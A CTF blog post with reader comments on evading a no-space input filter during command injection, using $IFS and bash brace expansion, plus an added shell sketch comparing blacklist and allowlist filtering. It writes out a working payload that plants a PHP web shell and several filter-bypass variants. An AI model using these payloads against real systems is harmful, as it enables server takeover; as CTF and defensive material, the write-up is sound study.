
Executing bash commands without space

25 July 2015

Hello, world.

So I was in this CTF competition and my teammate (@aboul3la) found a command injection vulnerability in one of the web application challenges.

If you input `>file.txt` the server creates a file called file.txt.

We wanted to write a PHP shell to the server (`echo "<?PHP CODE>" > file.php`).
But the thing is, the challenge had a filter that won’t allow you to have a space in the input (Error: Not valid URL).

So we tried around, and my first thought was to use some decoding mechanism to decrypt “space” from its hex equivalent or something, but we couldn’t do it without a space after the “echo”.
Then I thought I should search and see if the space (or tab) is defined in Linux itself.
And I found it: `$IFS`.

The solution was:

`echo$IFS"<?=system(\$_GET[x]);?>">shell.php`

If you wanted to wget something:

`wget$IFS"https://google.com/robots.txt"`

Update (25/8/2016):
Abk Khan commented below that there is a second solution to this.

`{echo,'~ AnonGuy'}>test.php`

I didn’t know brace expansions could be used with commands as well.

Thanks for the addition!
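Seen from the defending side, both tricks work because the filter blocks one character while the shell still parses the input a second time. The sketch below is an added example, not code from the original post or the challenge: the filter, the function names and the sample inputs are assumptions, and the inputs carry harmless arguments. It compares the space blacklist with an allowlist and with passing the input as a single quoted argument.

```shell
# Added example (constructed; not code from the original post or challenge).
LC_ALL=C; export LC_ALL   # byte-wise ranges in the allowlist below

# Hypothetical blacklist modelled on the challenge filter: reject only spaces.
naive_filter() {
  case "$1" in
    *" "*) return 1 ;;
  esac
  return 0
}

# Vulnerable pattern (assumed): input is pasted into a command string that a
# shell parses again. Prints how many words the shell ends up with.
words_when_reparsed() (
  eval "set -- $1"
  echo "$#"
)

# Safe pattern: input stays a single quoted argument and is never re-parsed.
words_when_quoted() (
  set -- "$1"
  echo "$#"
)

# Allowlist for the expected input (a URL). Anything outside these characters
# is rejected: $, quotes, braces, commas, <, >, ;, | and whitespace.
strict_filter() {
  case "$1" in
    ""|*[!A-Za-z0-9._~:/%-]*) return 1 ;;
  esac
  return 0
}

# Constructed inputs: a benign URL, then the post's two space-free forms.
# The brace form only splits in shells that do brace expansion (e.g. bash).
for input in 'https://example.com/robots.txt' 'echo$IFS"hi"' "{echo,'hi'}"; do
  if naive_filter "$input"; then n=pass; else n=block; fi
  if strict_filter "$input"; then s=pass; else s=block; fi
  printf '%-32s naive=%s strict=%s reparsed=%s quoted=%s\n' "$input" \
    "$n" "$s" "$(words_when_reparsed "$input")" "$(words_when_quoted "$input")"
done
```

The blacklist passes all three inputs, and the `$IFS` form still becomes two words once it is re-parsed; the allowlist rejects both space-free forms, and the quoted path always yields one word.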

4 Comments

  • H@c| said:

    I was wondering if there is any other way of printing a space in the command without using $IFS, as the $ character is also being sanitized from the input.

  • 0xAli (author) said:

    Tough question, but does it allow only alpha-numeric or just the $ and space?

  • Abk Khan said:

    You can use brace expansions if $ is getting filtered. 🙂
    `{echo,'~ AnonGuy'}>test.php`

  • 0xAli (author) said:

    This is great, thanks for sharing! I will include it in the article if you don’t mind.
